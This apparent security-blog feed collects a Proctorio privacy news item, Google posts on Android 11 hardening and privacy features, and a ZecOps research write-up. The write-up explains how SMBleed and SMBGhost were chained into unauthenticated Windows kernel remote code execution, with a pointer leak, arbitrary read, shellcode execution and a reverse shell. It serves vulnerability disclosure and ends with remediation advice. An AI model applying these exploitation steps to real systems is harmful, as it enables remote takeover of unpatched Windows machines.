Monthly Archives: June 2020

CEO of exam monitoring software Proctorio apologises for posting student’s chat logs on Reddit

Australian students who have raised privacy concerns describe the incident involving a Canadian student as ‘freakishly disrespectful’

The chief executive of an exam monitoring software firm that has raised privacy concerns in Australia has apologised for publicly posting a student’s chat logs during an argument on the website Reddit.

Mike Olsen, who is the CEO of the US-based Proctorio, has since deleted the posts and apologised, saying that he and Proctorio “take privacy very seriously”.

Related: Coalition's university fee overhaul accused of being an 'attack on women'

Related: Dan Tehan’s threat to police university enrolments can’t plug the holes in the Coalition’s logic

Continue reading...

System hardening in Android 11

In Android 11 we continue to increase the security of the Android platform. We have moved to safer default settings, migrated to a hardened memory allocator, and expanded the use of compiler mitigations that defend against classes of vulnerabilities and frustrate exploitation techniques.

Initializing memory

We’ve enabled forms of automatic memory initialization in both Android 11’s userspace and the Linux kernel. Uninitialized memory bugs occur in C/C++ when memory is used without having first been initialized to a known safe value. These types of bugs can be confusing, and even the term “uninitialized” is misleading. Uninitialized may seem to imply that a variable has a random value. In reality it isn’t random. It has whatever value was previously placed there. This value may be predictable or even attacker controlled. Unfortunately this behavior can result in a serious vulnerability such as information disclosure bugs like ASLR bypasses, or control flow hijacking via a stack or heap spray. Another possible side effect of using uninitialized values is advanced compiler optimizations may transform the code unpredictably, as this is considered undefined behavior by the relevant C standards.

In practice, uses of uninitialized memory are difficult to detect. Such errors may sit in the codebase unnoticed for years if the memory happens to be initialized with some "safe" value most of the time. When uninitialized memory results in a bug, it is often challenging to identify the source of the error, particularly if it is rarely triggered.

Eliminating an entire class of such bugs is a lot more effective than hunting them down individually. Automatic stack variable initialization relies on a feature in the Clang compiler which allows choosing initializing local variables with either zeros or a pattern.

Initializing to zero provides safer defaults for strings, pointers, indexes, and sizes. The downsides of zero init are less-safe defaults for return values, and exposing fewer bugs where the underlying code relies on zero initialization. Pattern initialization tends to expose more bugs and is generally safer for return values and less safe for strings, pointers, indexes, and sizes.

Initializing Userspace:

Automatic stack variable initialization is enabled throughout the entire Android userspace. During the development of Android 11, we initially selected pattern in order to uncover bugs relying on zero init and then moved to zero-init after a few months for increased safety. Platform OS developers can build with `AUTO_PATTERN_INITIALIZE=true m` if they want help uncovering bugs relying on zero init.

Initializing the Kernel:

Automatic stack and heap initialization were recently merged in the upstream Linux kernel. We have made these features available on earlier versions of Android’s kernel including 4.14, 4.19, and 5.4. These features enforce initialization of local variables and heap allocations with known values that cannot be controlled by attackers and are useless when leaked. Both features result in a performance overhead, but also prevent undefined behavior improving both stability and security.

For kernel stack initialization we adopted the CONFIG_INIT_STACK_ALL from upstream Linux. It currently relies on Clang pattern initialization for stack variables, although this is subject to change in the future.

Heap initialization is controlled by two boot-time flags, init_on_alloc and init_on_free, with the former wiping freshly allocated heap objects with zeroes (think s/kmalloc/kzalloc in the whole kernel) and the latter doing the same before the objects are freed (this helps to reduce the lifetime of security-sensitive data). init_on_alloc is a lot more cache-friendly and has smaller performance impact (within 2%), therefore it has been chosen to protect Android kernels.

Scudo is now Android's default native allocator

In Android 11, Scudo replaces jemalloc as the default native allocator for Android. Scudo is a hardened memory allocator designed to help detect and mitigate memory corruption bugs in the heap, such as:

Scudo does not fully prevent exploitation but it does add a number of sanity checks which are effective at strengthening the heap against some memory corruption bugs.

It also proactively organizes the heap in a way that makes exploitation of memory corruption more difficult, by reducing the predictability of the allocation patterns, and separating allocations by sizes.

In our internal testing, Scudo has already proven its worth by surfacing security and stability bugs that were previously undetected.

Finding Heap Memory Safety Bugs in the Wild (GWP-ASan)

Android 11 introduces GWP-ASan, an in-production heap memory safety bug detection tool that's integrated directly into the native allocator Scudo. GWP-ASan probabilistically detects and provides actionable reports for heap memory safety bugs when they occur, works on 32-bit and 64-bit processes, and is enabled by default for system processes and system apps.

GWP-ASan is also available for developer applications via a one line opt-in in an app's AndroidManifest.xml, with no complicated build support or recompilation of prebuilt libraries necessary.

Software Tag-Based KASAN

Continuing work on adopting the Arm Memory Tagging Extension (MTE) in Android, Android 11 includes support for kernel HWASAN, also known as Software Tag-Based KASAN. Userspace HWASAN is supported since Android 10.

KernelAddressSANitizer (KASAN) is a dynamic memory error detector designed to find out-of-bound and use-after-free bugs in the Linux kernel. Its Software Tag-Based mode is a software implementation of the memory tagging concept for the kernel. Software Tag-Based KASAN is available in 4.14, 4.19 and 5.4 Android kernels, and can be enabled with the CONFIG_KASAN_SW_TAGS kernel configuration option. Currently Tag-Based KASAN only supports tagging of slab memory; support for other types of memory (such as stack and globals) will be added in the future.

Compared to Generic KASAN, Tag-Based KASAN has significantly lower memory requirements (see this kernel commit for details), which makes it usable on dog food testing devices. Another use case for Software Tag-Based KASAN is checking the existing kernel code for compatibility with memory tagging. As Tag-Based KASAN is based on similar concepts as the future in-kernel MTE support, making sure that kernel code works with Tag-Based KASAN will ease in-kernel MTE integration in the future.

Expanding existing compiler mitigations

We’ve continued to expand the compiler mitigations that have been rolled out in prior releases as well. This includes adding both integer and bounds sanitizers to some core libraries that were lacking them. For example, the libminikin fonts library and the libui rendering library are now bounds sanitized. We’ve hardened the NFC stack by implementing both integer overflow sanitizer and bounds sanitizer in those components.

In addition to the hard mitigations like sanitizers, we also continue to expand our use of CFI as an exploit mitigation. CFI has been enabled in Android’s networking daemon, DNS resolver, and more of our core javascript libraries like libv8 and the PacProcessor.

The effectiveness of our software codec sandbox

Prior to the Release of Android 10 we announced a new constrained sandbox for software codecs. We’re really pleased with the results. Thus far, Android 10 is the first Android release since the infamous stagefright vulnerabilities in Android 5.0 with zero critical-severity vulnerabilities in the media frameworks.

Thank you to Jeff Vander Stoep, Alexander Potapenko, Stephen Hines, Andrey Konovalov, Mitch Phillips, Ivan Lozano, Kostya Kortchinsky, Christopher Ferris, Cindy Zhou, Evgenii Stepanov, Kevin Deus, Peter Collingbourne, Elliott Hughes, Kees Cook and Ken Chen for their contributions to this post.

11 Weeks of Android: Privacy and Security

This blog post is part of a weekly series for #11WeeksOfAndroid. For each #11WeeksOfAndroid, we’re diving into a key area so you don’t miss anything. This week, we spotlighted Privacy and Security; here’s a look at what you should know.

mobile security illustration

Privacy and security is core to how we design Android, and with every new release we increase our investment in this space. Android 11 continues to make important strides in these areas, and this week we’ll be sharing a series of updates and resources about Android privacy and security. But first, let’s take a quick look at some of the most important changes we’ve made in Android 11 to protect user privacy and make the platform more secure.

As shared in the “All things privacy in Android 11” video, we’re giving users even more control over sensitive permissions. Throughout the development of this release, we have engaged deeply and frequently with our developer community to design these features in a balanced way - amplifying user privacy while minimizing developer impact. Let’s go over some of these features:

One-time permission: In Android 10, we introduced a granular location permission that allows users to limit access to location only when an app is in use (aka foreground only). When presented with the new runtime permissions options, users choose foreground only location more than 50% of the time. This demonstrated to us that users really wanted finer controls for permissions. So in Android 11, we’ve introduced one time permissions that let users give an app access to the device microphone, camera, or location, just that one time. As an app developer, there are no changes that you need to make to your app for it to work with one time permissions, and the app can request permissions again the next time the app is used. Learn more about building privacy-friendly apps with these new changes in this video.

Background location: In Android 10 we added a background location usage reminder so users can see how apps are using this sensitive data on a regular basis. Users who interacted with the reminder either downgraded or denied the location permission over 75% of the time. In addition, we have done extensive research and believe that there are very few legitimate use cases for apps to require access to location in the background.

In Android 11, background location will no longer be a permission that a user can grant via a run time prompt and it will require a more deliberate action. If your app needs background location, the system will ensure that the app first asks for foreground location. The app can then broaden its access to background location through a separate permission request, which will cause the system to take the user to Settings in order to complete the permission grant.

In February, we announced that Google Play developers will need to get approval to access background location in their app to prevent misuse. We're giving developers more time to make changes and won't be enforcing the policy for existing apps until 2021. Check out this helpful video to find possible background location usage in your code.

Permissions auto-reset: Most users tend to download and install over 60 apps on their device but interact with only a third of these apps on a regular basis. If users haven’t used an app that targets Android 11 for an extended period of time, the system will “auto-reset” all of the granted runtime permissions associated with the app and notify the user. The app can request the permissions again the next time the app is used. If you have an app that has a legitimate need to retain permissions, you can prompt users to turn this feature OFF for your app in Settings.

Data access auditing APIs: Android encourages developers to limit their access to sensitive data, even if they have been granted permission to do so. In Android 11, developers will have access to new APIs that will give them more transparency into their app’s usage of private and protected data. The APIs will enable apps to track when the system records the app’s access to private user data.

Scoped Storage: In Android 10, we introduced scoped storage which provides a filtered view into external storage, giving access to app-specific files and media collections. This change protects user privacy by limiting broad access to shared storage in many ways including changing the storage permission to only give read access to photos, videos and music and improving app storage attribution. Since Android 10, we’ve incorporated developer feedback and made many improvements to help developers adopt scoped storage, including: updated permission UI to enhance user experience, direct file path access to media to improve compatibility with existing libraries, updated APIs for modifying media, Manage External Storage permission to enable select use cases that need broad files access, and protected external app directories. In Android 11, scoped storage will be mandatory for all apps that target API level 30. Learn more in this video and check out the developer documentation for further details.

Google Play system updates: Google Play system updates were introduced with Android 10 as part of Project Mainline. Their main benefit is to increase the modularity and granularity of platform subsystems within Android so we can update core OS components without needing a full OTA update from your phone manufacturer. Earlier this year, thanks to Project Mainline, we were able to quickly fix a critical vulnerability in the media decoding subsystem. Android 11 adds new modules, and maintains the security properties of existing ones. For example, Conscrypt, which provides cryptographic primitives, maintained its FIPS validation in Android 11 as well.

BiometricPrompt API: Developers can now use the BiometricPrompt API to specify the biometric authenticator strength required by their app to unlock or access sensitive parts of the app. We are planning to add this to the Jetpack Biometric library to allow for backward compatibility and will share further updates on this work as it progresses.

Identity Credential API: This will unlock new use cases such as mobile drivers licences, National ID, and Digital ID. It’s being built by our security team to ensure this information is stored safely, using security hardware to secure and control access to the data, in a way that enhances user privacy as compared to traditional physical documents. We’re working with various government agencies and industry partners to make sure that Android 11 is ready for such digital-first identity experiences.

Thank you for your flexibility and feedback as we continue to build an increasingly more private and secure platform. You can learn about more features in the Android 11 Beta developer site. You can also learn about general best practices related to privacy and security.

Please follow Android Developers on Twitter and Youtube to catch helpful content and materials in this area all this week.

Resources

You can find the entire playlist of #11WeeksOfAndroid video content here, and learn more about each week here. We’ll continue to spotlight new areas each week, so keep an eye out and follow us on Twitter and YouTube. Thanks so much for letting us be a part of this experience with you!

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

Introduction

Previous SMBleedingGhost write-ups: 

In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has less limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in the modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try and read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us grooming the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/  (orange) LIST_ENTRY ConnectionBufferList;
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  (blue) PBYTE UserBufferPtr;
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  (blue) PBYTE PoolAllocationPtr;
/*38*/  (blue) PMDL pMdl1;
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  (blue) PMDL pMdl2;
/*58*/  (orange) PVOID pSrvNetWskStruct;
/*60*/  DWORD SmbFlags;
/*64*/  (orange) PVOID TracingPtr1;
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  (orange) PVOID TracingPtr2;
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
};
#pragma pack(pop)

The colored variables are pointers. The blue-colored pointers all point inside the pool-allocated memory block, with offsets which can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the orange-colored pointers:

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there, too. On the bright side, there are several pointers to modules one additional dereference away:

At this point, we noticed that since we can override those pointers in SRVNET_RECT, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
{
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);
    }

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL
        }

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');
    }
}

Upon freeing the buffer, if buffer flags 0x02 (means the buffer is part of a lookaside list) and 0x01 (means the buffer has no transport header) are set, some operations are made on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer back to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at the operations in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16, 29), a side effect we hoped to avoid.

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The Flags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECT struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC and such fix was left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(pSrvNetRecv + 0x118);
Arg1 = *(ULONG_PTR)(pSrvNetRecv + 0x128);
Arg2 = *(ULONG_PTR)(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECT struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though a 8-arguments function is intended to be called, we can replace the pointer with a function that expects any other amount of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECT struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECT struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECT struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECT struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the amount of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited by functions implemented in srvnet.sys, we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct which holds a pointer to the string, and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data:

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 version R5 and newer. Since Windows 10 version R5 UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work, we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists buffer reusing, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list.

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor Incoming packets handled
Logical processor 1 0.2%
Logical processor 2 0.8%
Logical processor 3 7.9%
Logical processor 4 91.1%

Here’s the distribution of handling the decompression:

Logical processor Decompressions executed
Logical processor 1 13.3%
Logical processor 2 5.1%
Logical processor 3 6.8%
Logical processor 4 74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for a reading and writing order.

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

ZecOps classify forensics logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities, that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security issues (recommended)
  • Block port 445 / enforce host-isolation
  • Disable SMBv3.1.1 compression

Summary

This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.

Is upatre downloader coming back ?

Hi Folks, today I want to share a quantitative analysis on a weird return-match by Upatre. According to Unit42 Upatre is an ancient downloader firstly spotted in 2013 used to inoculate banking trojans and active up to 2016.

